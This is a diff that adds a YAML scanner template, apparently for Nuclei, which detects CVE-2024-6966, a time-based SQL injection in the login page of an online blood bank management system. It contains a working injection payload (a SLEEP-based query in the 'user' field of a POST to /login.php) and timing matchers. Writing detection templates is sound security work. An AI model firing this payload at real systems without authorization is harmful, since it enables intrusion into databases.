Added template for CVE-2024-6966, issue #10393

cve-2024-6966.yaml

@@ -0,0 +1,42 @@
+id: cve-2024-6966
+
+info:
+  name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page
+  author: cl4irv0yance
+  description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. 
+  severity: High
+  reference: 
+    - https://github.com/HermesCui/CVE/issues/1
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-6966
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 7.3
+    cve-id: cve-2024-6966
+  tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode
+
+
+http:
+  - raw:
+      - |
+        @timeout: 25s
+        POST /login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Username'
+          - 'Password'
+          - 'Keep me Signed in'
+          - 'Forgot Password'
+          - 'Wrong email or password'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'duration>=10'